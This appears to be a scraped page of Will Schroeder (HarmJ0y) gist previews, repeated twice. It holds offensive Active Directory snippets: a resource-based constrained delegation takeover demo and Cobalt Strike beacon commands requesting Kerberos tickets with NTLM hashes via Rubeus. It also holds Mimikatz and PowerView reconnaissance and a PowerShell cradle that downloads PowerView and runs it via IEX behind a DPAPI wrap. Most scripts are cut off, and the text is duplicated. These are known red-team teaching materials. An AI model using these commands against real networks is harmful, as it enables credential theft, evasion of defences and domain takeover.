Will HarmJ0y

## rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1

# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami

# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"

## gist:dc379107cfb4aa7ef5c3ecbac0133a02
##### IF ELEVATED:

# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

## cobaltstrike_sa.txt
Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Users who have authed to the system:
	ls C:\Users\

System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

Saved outbound RDP connections:

## New-SYSVOLZip.ps1
function New-SYSVOLZip {
<#
.SYNOPSIS

Compresses all folders/files in SYSVOL to a .zip file.

Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None

## DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')

$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)

IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## Get-NonstandardService.ps1
function Get-NonstandardService {
<#
.SYNOPSIS

Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.

Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None

## powershell_talks.txt
BSides LV 2015 - "Building an Empire with PowerShell" - https://www.youtube.com/watch?v=Pq9t59w0mUI

BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" - https://www.youtube.com/watch?v=xHkRhRo3l8o
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" - https://www.youtube.com/watch?v=RcDq9GgiUB4

PowerShell Summit 2016 - "Digital Forensics with PowerShell" - https://www.youtube.com/watch?v=gm9A7FaWTkY

BSides LV 2016 - "Building an EmPyre with Python" - https://www.youtube.com/watch?v=79qzgVTP3Yc

DerbyCon 2016 - "A Year in the Empire" - https://www.youtube.com/watch?v=ngvHshHCt_8

## ConvertFrom-UserParameter.ps1
function ConvertFrom-UserParameter {
<#
.SYNOPSIS

Converts a userparameters encoded blob into an ordered dictionary of decoded values.

Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None

## 44con_demo.ps1
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1

# map all reachable domain trusts
Invoke-MapDomainTrust

# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName
	# import the necessary toolsets
	Import-Module .\powermad.ps1
	Import-Module .\powerview.ps1

	# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
	whoami

	# the target computer object we're taking over
	$TargetComputer = "primary.testlab.local"
	##### IF ELEVATED:

	# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
	beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

	# decode the base64 blob to a binary .kirbi
	$ base64 -d ticket.b64 > ticket.kirbi

	# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
	beacon> make_token DOMAIN\USER PassWordDoesntMatter
	Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

	Users who have authed to the system:
	ls C:\Users\

	System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

	Saved outbound RDP connections:
	function New-SYSVOLZip {
	<#
	.SYNOPSIS

	Compresses all folders/files in SYSVOL to a .zip file.

	Author: Will Schroeder (@harmj0y)
	License: BSD 3-Clause
	Required Dependencies: None
	Add-Type -AssemblyName System.Security
	$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')

	$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
	$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)

	IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	function Get-NonstandardService {
	<#
	.SYNOPSIS

	Returns services where the associated binaries are either not signed, or are
	signed by an issuer not matching 'Microsoft'.

	Author: Will Schroeder (@harmj0y)
	License: BSD 3-Clause
	Required Dependencies: None
	BSides LV 2015 - "Building an Empire with PowerShell" - https://www.youtube.com/watch?v=Pq9t59w0mUI

	BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" - https://www.youtube.com/watch?v=xHkRhRo3l8o
	BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" - https://www.youtube.com/watch?v=RcDq9GgiUB4

	PowerShell Summit 2016 - "Digital Forensics with PowerShell" - https://www.youtube.com/watch?v=gm9A7FaWTkY

	BSides LV 2016 - "Building an EmPyre with Python" - https://www.youtube.com/watch?v=79qzgVTP3Yc

	DerbyCon 2016 - "A Year in the Empire" - https://www.youtube.com/watch?v=ngvHshHCt_8
	function ConvertFrom-UserParameter {
	<#
	.SYNOPSIS

	Converts a userparameters encoded blob into an ordered dictionary of decoded values.

	Author: Will Schroeder (@harmj0y)
	License: BSD 3-Clause
	Required Dependencies: None
	# import PowerView and Invoke-Mimikatz
	Import-Module .\powerview.ps1
	Import-Module .\mimikatz.ps1

	# map all reachable domain trusts
	Invoke-MapDomainTrust

	# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
	Find-ForeignGroup -Domain external.local
	Find-ForeignGroup -Domain external.local \| Select-Object -ExpandProperty UserName \| Convert-SidToName